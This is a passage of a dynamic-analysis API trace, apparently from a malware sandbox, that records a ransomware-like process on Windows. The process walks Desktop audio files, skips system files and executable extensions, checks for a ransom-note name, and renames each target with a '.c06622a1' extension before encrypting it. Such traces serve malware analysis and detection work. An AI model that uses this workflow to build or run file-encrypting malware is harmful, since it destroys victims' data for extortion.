[0148.508] wcslen (_String="cab") returned 0x3 [0148.508] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0148.508] wcslen (_String="cmd") returned 0x3 [0148.508] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0148.508] wcslen (_String="com") returned 0x3 [0148.508] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0148.508] wcslen (_String="cpl") returned 0x3 [0148.508] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0148.508] wcslen (_String="cur") returned 0x3 [0148.508] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0148.508] wcslen (_String="deskthemepack") returned 0xd [0148.508] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0148.508] wcslen (_String="diagcab") returned 0x7 [0148.508] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0148.508] wcslen (_String="diagcfg") returned 0x7 [0148.508] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0148.508] wcslen (_String="diagpkg") returned 0x7 [0148.509] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0148.509] wcslen (_String="dll") returned 0x3 [0148.509] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0148.509] wcslen (_String="drv") returned 0x3 [0148.509] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0148.509] wcslen (_String="exe") returned 0x3 [0148.509] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0148.509] wcslen (_String="hlp") returned 0x3 [0148.509] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0148.509] wcslen (_String="icl") returned 0x3 [0148.509] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0148.509] wcslen (_String="icns") returned 0x4 [0148.509] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0148.509] wcslen (_String="ico") returned 0x3 [0148.509] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0148.509] wcslen (_String="ics") returned 0x3 [0148.509] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0148.509] wcslen (_String="idx") returned 0x3 [0148.509] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0148.509] wcslen (_String="ldf") returned 0x3 [0148.509] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0148.509] wcslen (_String="lnk") returned 0x3 [0148.509] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0148.509] wcslen (_String="mod") returned 0x3 [0148.509] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0148.509] wcslen (_String="mpa") returned 0x3 [0148.509] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0148.509] wcslen (_String="msc") returned 0x3 [0148.509] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0148.510] wcslen (_String="msp") returned 0x3 [0148.510] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0148.510] wcslen (_String="msstyles") returned 0x8 [0148.510] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0148.510] wcslen (_String="msu") returned 0x3 [0148.510] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0148.510] wcslen (_String="nls") returned 0x3 [0148.510] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0148.510] wcslen (_String="nomedia") returned 0x7 [0148.510] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0148.510] wcslen (_String="ocx") returned 0x3 [0148.510] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0148.510] wcslen (_String="prf") returned 0x3 [0148.510] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0148.510] wcslen (_String="ps1") returned 0x3 [0148.510] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0148.510] wcslen (_String="rom") returned 0x3 [0148.510] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0148.510] wcslen (_String="rtp") returned 0x3 [0148.510] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0148.510] wcslen (_String="scr") returned 0x3 [0148.510] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0148.510] wcslen (_String="shs") returned 0x3 [0148.510] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0148.510] wcslen (_String="spl") returned 0x3 [0148.510] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0148.510] wcslen (_String="sys") returned 0x3 [0148.510] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0148.510] wcslen (_String="theme") returned 0x5 [0148.511] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0148.511] wcslen (_String="themepack") returned 0x9 [0148.511] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0148.511] wcslen (_String="wpx") returned 0x3 [0148.511] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0148.511] wcslen (_String="lock") returned 0x4 [0148.511] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0148.511] wcslen (_String="key") returned 0x3 [0148.511] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0148.511] wcslen (_String="hta") returned 0x3 [0148.511] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0148.511] wcslen (_String="msi") returned 0x3 [0148.511] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0148.511] wcslen (_String="pdb") returned 0x3 [0148.511] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0148.511] wcslen (_String="sql") returned 0x3 [0148.511] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0148.511] wcslen (_String="sqlite") returned 0x6 [0148.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.511] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.511] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.511] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.511] wcscpy (in: _Dest=0x44d00cc, _Source="TnvVAS.m4a" | out: _Dest="TnvVAS.m4a") returned="TnvVAS.m4a" [0148.511] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TnvVAS.m4a", dwFileAttributes=0x80) returned 1 [0148.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TnvVAS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tnvvas.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0148.512] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.512] ReadFile (in: hFile=0x134, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.513] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x87c5ef36 [0148.513] RtlComputeCrc32 (PartialCrc=0xef36, Buffer=0x3feb74, Length=0x80) returned 0xd8b19d1f [0148.513] RtlComputeCrc32 (PartialCrc=0x9d1f, Buffer=0x3feb74, Length=0x80) returned 0x5e31c55c [0148.513] RtlComputeCrc32 (PartialCrc=0xc55c, Buffer=0x3feb74, Length=0x80) returned 0x449c97e7 [0148.513] RtlComputeCrc32 (PartialCrc=0x97e7, Buffer=0x3feb74, Length=0x80) returned 0x26529c45 [0148.513] CloseHandle (hObject=0x134) returned 1 [0148.513] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.513] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TnvVAS.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TnvVAS.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TnvVAS.m4a" [0148.513] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TnvVAS.m4a") returned 0x34 [0148.513] wcscpy (in: _Dest=0x44e00e8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.513] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TnvVAS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tnvvas.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TnvVAS.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tnvvas.m4a.c06622a1"), dwFlags=0x8) returned 1 [0148.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TnvVAS.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tnvvas.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x134 [0148.515] CreateIoCompletionPort (FileHandle=0x134, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.515] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4ee0020 [0148.521] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x218516a9 [0148.521] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64dadd36 [0148.521] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3b816c6f [0148.521] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfd0ee70 [0148.521] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a56a247 [0148.521] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64d6546f [0148.521] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50e65fed [0148.521] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a8728d7 [0148.524] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4ee0094, Length=0x80) returned 0xa41cf8c9 [0148.524] RtlComputeCrc32 (PartialCrc=0xf8c9, Buffer=0x4ee0094, Length=0x80) returned 0x30ef8b88 [0148.525] RtlComputeCrc32 (PartialCrc=0x8b88, Buffer=0x4ee0094, Length=0x80) returned 0x72769c6a [0148.525] RtlComputeCrc32 (PartialCrc=0x9c6a, Buffer=0x4ee0094, Length=0x80) returned 0xed20b7f4 [0148.525] RtlComputeCrc32 (PartialCrc=0xb7f4, Buffer=0x4ee0094, Length=0x80) returned 0x215e6dd6 [0148.525] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ee0020) returned 1 [0148.525] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.525] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.525] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5f93d10, ftCreationTime.dwHighDateTime=0x1d5de39, ftLastAccessTime.dwLowDateTime=0x85a7c3a0, ftLastAccessTime.dwHighDateTime=0x1d5e5c5, ftLastWriteTime.dwLowDateTime=0x85a7c3a0, ftLastWriteTime.dwHighDateTime=0x1d5e5c5, nFileSizeHigh=0x0, nFileSizeLow=0x133e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="U5A1wNa5RsBATNvj.mp3", cAlternateFileName="U5A1WN~1.MP3")) returned 1 [0148.525] _wcsicmp (_Str1="U5A1wNa5RsBATNvj.mp3", _Str2="README.c06622a1.TXT") returned 3 [0148.525] wcsstr (_Str="U5A1wNa5RsBATNvj.mp3", _SubStr="README") returned 0x0 [0148.525] _wcsicmp (_Str1="autorun.inf", _Str2="U5A1wNa5RsBATNvj.mp3") returned -20 [0148.525] wcslen (_String="autorun.inf") returned 0xb [0148.525] _wcsicmp (_Str1="boot.ini", _Str2="U5A1wNa5RsBATNvj.mp3") returned -19 [0148.525] wcslen (_String="boot.ini") returned 0x8 [0148.525] _wcsicmp (_Str1="bootfont.bin", _Str2="U5A1wNa5RsBATNvj.mp3") returned -19 [0148.525] wcslen (_String="bootfont.bin") returned 0xc [0148.525] _wcsicmp (_Str1="bootsect.bak", _Str2="U5A1wNa5RsBATNvj.mp3") returned -19 [0148.525] wcslen (_String="bootsect.bak") returned 0xc [0148.525] _wcsicmp (_Str1="desktop.ini", _Str2="U5A1wNa5RsBATNvj.mp3") returned -17 [0148.525] wcslen (_String="desktop.ini") returned 0xb [0148.525] _wcsicmp (_Str1="iconcache.db", _Str2="U5A1wNa5RsBATNvj.mp3") returned -12 [0148.525] wcslen (_String="iconcache.db") returned 0xc [0148.525] _wcsicmp (_Str1="ntldr", _Str2="U5A1wNa5RsBATNvj.mp3") returned -7 [0148.525] wcslen (_String="ntldr") returned 0x5 [0148.525] _wcsicmp (_Str1="ntuser.dat", _Str2="U5A1wNa5RsBATNvj.mp3") returned -7 [0148.525] wcslen (_String="ntuser.dat") returned 0xa [0148.525] _wcsicmp (_Str1="ntuser.dat.log", _Str2="U5A1wNa5RsBATNvj.mp3") returned -7 [0148.526] wcslen (_String="ntuser.dat.log") returned 0xe [0148.526] _wcsicmp (_Str1="ntuser.ini", _Str2="U5A1wNa5RsBATNvj.mp3") returned -7 [0148.526] wcslen (_String="ntuser.ini") returned 0xa [0148.526] _wcsicmp (_Str1="thumbs.db", _Str2="U5A1wNa5RsBATNvj.mp3") returned -1 [0148.526] wcslen (_String="thumbs.db") returned 0x9 [0148.526] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0148.526] wcslen (_String="386") returned 0x3 [0148.526] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0148.526] wcslen (_String="adv") returned 0x3 [0148.526] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0148.526] wcslen (_String="ani") returned 0x3 [0148.526] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0148.526] wcslen (_String="bat") returned 0x3 [0148.526] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0148.526] wcslen (_String="bin") returned 0x3 [0148.526] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0148.527] wcslen (_String="cab") returned 0x3 [0148.527] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0148.527] wcslen (_String="cmd") returned 0x3 [0148.527] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0148.527] wcslen (_String="com") returned 0x3 [0148.527] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0148.527] wcslen (_String="cpl") returned 0x3 [0148.527] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0148.527] wcslen (_String="cur") returned 0x3 [0148.527] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0148.527] wcslen (_String="deskthemepack") returned 0xd [0148.527] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0148.527] wcslen (_String="diagcab") returned 0x7 [0148.527] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0148.527] wcslen (_String="diagcfg") returned 0x7 [0148.527] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0148.527] wcslen (_String="diagpkg") returned 0x7 [0148.527] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0148.527] wcslen (_String="dll") returned 0x3 [0148.527] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0148.527] wcslen (_String="drv") returned 0x3 [0148.527] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0148.527] wcslen (_String="exe") returned 0x3 [0148.527] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0148.527] wcslen (_String="hlp") returned 0x3 [0148.527] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0148.527] wcslen (_String="icl") returned 0x3 [0148.527] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0148.527] wcslen (_String="icns") returned 0x4 [0148.527] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0148.528] wcslen (_String="ico") returned 0x3 [0148.528] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0148.528] wcslen (_String="ics") returned 0x3 [0148.528] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0148.528] wcslen (_String="idx") returned 0x3 [0148.528] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0148.528] wcslen (_String="ldf") returned 0x3 [0148.528] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0148.528] wcslen (_String="lnk") returned 0x3 [0148.528] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0148.528] wcslen (_String="mod") returned 0x3 [0148.528] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0148.528] wcslen (_String="mpa") returned 0x3 [0148.528] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0148.528] wcslen (_String="msc") returned 0x3 [0148.528] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0148.528] wcslen (_String="msp") returned 0x3 [0148.528] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0148.528] wcslen (_String="msstyles") returned 0x8 [0148.528] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0148.528] wcslen (_String="msu") returned 0x3 [0148.528] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0148.528] wcslen (_String="nls") returned 0x3 [0148.528] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0148.528] wcslen (_String="nomedia") returned 0x7 [0148.528] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0148.528] wcslen (_String="ocx") returned 0x3 [0148.528] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0148.529] wcslen (_String="prf") returned 0x3 [0148.529] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0148.529] wcslen (_String="ps1") returned 0x3 [0148.529] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0148.529] wcslen (_String="rom") returned 0x3 [0148.529] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0148.529] wcslen (_String="rtp") returned 0x3 [0148.529] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0148.529] wcslen (_String="scr") returned 0x3 [0148.529] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0148.529] wcslen (_String="shs") returned 0x3 [0148.529] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0148.529] wcslen (_String="spl") returned 0x3 [0148.529] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0148.529] wcslen (_String="sys") returned 0x3 [0148.529] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0148.529] wcslen (_String="theme") returned 0x5 [0148.529] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0148.529] wcslen (_String="themepack") returned 0x9 [0148.529] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0148.529] wcslen (_String="wpx") returned 0x3 [0148.529] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0148.529] wcslen (_String="lock") returned 0x4 [0148.529] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0148.529] wcslen (_String="key") returned 0x3 [0148.529] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0148.529] wcslen (_String="hta") returned 0x3 [0148.529] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0148.529] wcslen (_String="msi") returned 0x3 [0148.530] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0148.530] wcslen (_String="pdb") returned 0x3 [0148.530] _wcsicmp (_Str1="sql", _Str2="mp3") returned 6 [0148.530] wcslen (_String="sql") returned 0x3 [0148.530] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0148.530] wcslen (_String="sqlite") returned 0x6 [0148.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.530] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.530] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.530] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.530] wcscpy (in: _Dest=0x44d00cc, _Source="U5A1wNa5RsBATNvj.mp3" | out: _Dest="U5A1wNa5RsBATNvj.mp3") returned="U5A1wNa5RsBATNvj.mp3" [0148.530] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U5A1wNa5RsBATNvj.mp3", dwFileAttributes=0x80) returned 1 [0148.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U5A1wNa5RsBATNvj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u5a1wna5rsbatnvj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x614 [0148.530] SetFilePointerEx (in: hFile=0x614, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.530] ReadFile (in: hFile=0x614, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.531] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xe8d7a67f [0148.531] RtlComputeCrc32 (PartialCrc=0xa67f, Buffer=0x3feb74, Length=0x80) returned 0x99d55005 [0148.531] RtlComputeCrc32 (PartialCrc=0x5005, Buffer=0x3feb74, Length=0x80) returned 0xea31ba5f [0148.531] RtlComputeCrc32 (PartialCrc=0xba5f, Buffer=0x3feb74, Length=0x80) returned 0x66cbc7d1 [0148.531] RtlComputeCrc32 (PartialCrc=0xc7d1, Buffer=0x3feb74, Length=0x80) returned 0xcdd1cebc [0148.531] CloseHandle (hObject=0x614) returned 1 [0148.531] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.532] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U5A1wNa5RsBATNvj.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U5A1wNa5RsBATNvj.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U5A1wNa5RsBATNvj.mp3" [0148.532] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U5A1wNa5RsBATNvj.mp3") returned 0x3e [0148.532] wcscpy (in: _Dest=0x44e00fc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.532] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U5A1wNa5RsBATNvj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u5a1wna5rsbatnvj.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U5A1wNa5RsBATNvj.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u5a1wna5rsbatnvj.mp3.c06622a1"), dwFlags=0x8) returned 1 [0148.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U5A1wNa5RsBATNvj.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u5a1wna5rsbatnvj.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x614 [0148.534] CreateIoCompletionPort (FileHandle=0x614, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.534] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4f70020 [0148.540] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x746a1c72 [0148.540] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1b5d0a96 [0148.540] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x530fb525 [0148.540] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ec303e7 [0148.540] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1fe147a2 [0148.540] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7463b9b2 [0148.541] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3f19f722 [0148.541] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x683196e9 [0148.544] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4f70094, Length=0x80) returned 0xad6fa1c9 [0148.544] RtlComputeCrc32 (PartialCrc=0xa1c9, Buffer=0x4f70094, Length=0x80) returned 0xceede761 [0148.544] RtlComputeCrc32 (PartialCrc=0xe761, Buffer=0x4f70094, Length=0x80) returned 0xdff39753 [0148.544] RtlComputeCrc32 (PartialCrc=0x9753, Buffer=0x4f70094, Length=0x80) returned 0xdcde9435 [0148.544] RtlComputeCrc32 (PartialCrc=0x9435, Buffer=0x4f70094, Length=0x80) returned 0x722160d6 [0148.544] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4f70020) returned 1 [0148.544] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.544] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.544] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb07b5e70, ftCreationTime.dwHighDateTime=0x1d5dcc9, ftLastAccessTime.dwLowDateTime=0x909216c0, ftLastAccessTime.dwHighDateTime=0x1d5e3fa, ftLastWriteTime.dwLowDateTime=0x909216c0, ftLastWriteTime.dwHighDateTime=0x1d5e3fa, nFileSizeHigh=0x0, nFileSizeLow=0x25cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="UB2iD9do9wG9wA7Spg.m4a", cAlternateFileName="UB2ID9~1.M4A")) returned 1 [0148.544] _wcsicmp (_Str1="UB2iD9do9wG9wA7Spg.m4a", _Str2="README.c06622a1.TXT") returned 3 [0148.544] wcsstr (_Str="UB2iD9do9wG9wA7Spg.m4a", _SubStr="README") returned 0x0 [0148.544] _wcsicmp (_Str1="autorun.inf", _Str2="UB2iD9do9wG9wA7Spg.m4a") returned -20 [0148.544] wcslen (_String="autorun.inf") returned 0xb [0148.544] _wcsicmp (_Str1="boot.ini", _Str2="UB2iD9do9wG9wA7Spg.m4a") returned -19 [0148.544] wcslen (_String="boot.ini") returned 0x8 [0148.544] _wcsicmp (_Str1="bootfont.bin", _Str2="UB2iD9do9wG9wA7Spg.m4a") returned -19 [0148.544] wcslen (_String="bootfont.bin") returned 0xc [0148.544] _wcsicmp (_Str1="bootsect.bak", _Str2="UB2iD9do9wG9wA7Spg.m4a") returned -19 [0148.544] wcslen (_String="bootsect.bak") returned 0xc [0148.544] _wcsicmp (_Str1="desktop.ini", _Str2="UB2iD9do9wG9wA7Spg.m4a") returned -17 [0148.545] wcslen (_String="desktop.ini") returned 0xb [0148.545] _wcsicmp (_Str1="iconcache.db", 